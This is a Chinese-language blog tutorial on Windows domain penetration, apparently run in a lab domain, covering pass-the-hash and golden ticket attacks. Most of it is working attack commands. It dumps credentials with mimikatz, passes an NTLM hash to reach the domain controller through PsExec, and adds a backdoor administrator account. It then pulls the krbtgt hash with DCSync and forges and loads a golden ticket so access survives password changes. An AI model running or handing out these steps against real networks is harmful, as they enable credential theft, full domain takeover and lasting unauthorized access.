域渗透——哈希传递、黄金票据

目录

• 域渗透

 

---

作者：@Xuno
本文为作者原创，转载请注明出处：https://www.cnblogs.com/MaoheLaoXu/p/17175535.html

---

Top

域渗透

1.
安装域

接着点击安装向导

加入域：

需要设置dns服务器为域控机

---

域控可以登陆任意域中的电脑

Windows认证协议 - Kerberos，也可以叫做票据

我们查看域控 在cmd输入

net user /domain

还可以在dns里查看，一般dns都是域控机

当我们获取到了administator的权限的时候，我们可以利用windows官方的工具去提权

指令：

psexec -i -d -s cmd.exe//获取权限

然后再次输入net user /domain，就可以获取域控的名字，同样我们用猕猴桃能够抓取到域控的密文密码

sekurlsa::logonpasswords//猕猴桃抓取密码

仅仅是这样，我们是无法做到访问域控的，这个时候我们就需要用到哈希传递

在猕猴桃内：

sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:327a5087d83c664096919afbd40f21c8  //登陆用户 域地址          ntlm加密值

然后就会弹出一个命令框，这就是域控端，我们可以去查看C盘文件

dir \\WIN-D6PMU0BTMC1.zkaq.cn\c

也可以利用Windows的官方工具psexec，进行提权成域控cmd

在这个框内输入

PsExec.exe \\WIN-D6PMU0BTMC1.zkaq.cn cmd

成功变成域控的cmd

net user nf 密码 /add//创建用户名
net localgroup administrators nf /add

这样就能成功登陆域控机
但是为了维持长久的控制，管理员会经常进行更换密码
这就是需要做到黄金票据

---

黄金票据

域渗透中其实有金银票据，一个是黄金票据一个是白银票据。一个用的是域控用户账户，一个用的是krbtgt账户

金票权限是最大的，我们主讲黄金票据。

这个必须要登陆域控机，上传一个猕猴桃，猕猴桃先来个二连，再输入这串命令

lsadump::dcsync /user:krbtgt

我们需要记录一串SID，记住SID是不包含-502的，千万别把-502写进去

还要Hash NTML

制作票据，然后在复制到猕猴桃内

kerberos::golden /admin:administrator /domain:zkaq.cn /sid:S-1-5-21-1720693672-3610745784-2269473857 /krbtgt:1176ad25a126d316ed5ea4b60b3d71dd /ticket:administrator.kiribi  [制作票据]

kerberos::ptt administrator.kiribi      [加载票据]//直接在普通cmd行内执行就行了

---

如果您觉得阅读本文对您有帮助，请点一下“推荐”按钮，您的“推荐”将是我最大的写作动力！欢迎各位转载，但是未经作者本人同意，转载文章之后必须在文章页面明显位置给出作者和原文连接，否则保留追究法律责任的权利。